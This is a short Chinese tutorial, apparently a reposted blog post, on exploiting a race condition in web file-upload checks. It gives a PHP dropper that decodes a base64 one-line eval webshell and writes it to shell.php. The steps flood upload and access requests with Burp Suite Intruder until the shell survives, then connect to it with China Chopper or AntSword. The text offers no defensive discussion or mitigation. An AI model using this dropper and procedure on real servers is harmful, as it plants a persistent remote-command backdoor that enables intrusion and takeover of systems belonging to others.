文件上传之条件竞争
作者:互联网
文件上传之条件竞争
原理:先保存文件
查看文件是否符合条件
满足(保留文件并重命名)
不满足(删除文件)
我们上传文件要在保存文件后在他被删除之前访问到他,所以访问速度一定要快,使用burpsuite的intruder功能来重复访问和发送。
第一步、正常上传,查看文件保存目录
第二步、抓包,抓取上传木马的包,发送到intruder,重复发包。
木马要能生小马,这样我们访问木马(a.php),木马就会生下小马(shell.php),木马会被删除但是小马会被留下。
<?php
$a='PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+';
$myfile = fopen("shell.php", "w");
fwrite($myfile, base64_decode($a));
fclose($myfile);
?>
第三步、再去抓取访问木马(a.php)的包,发送到intruder
第四步、重复发送和访问,知道木马生成小马(访问状态200)
打开intruder,攻击类型选择Sniper,清除符号(我这个是汉化版的,英文版的跟这对应)
另一个也是如此
第五步、开始重复访问,开始重复发送,先开始访问,再开始发送
发现有200状态,说明木马已经生成小马
第六步、进行连接用中国菜刀或者中国蚁剑都可以
标签:文件,小马,竞争,访问,intruder,木马,上传 来源: https://www.cnblogs.com/mantou0/p/15929249.html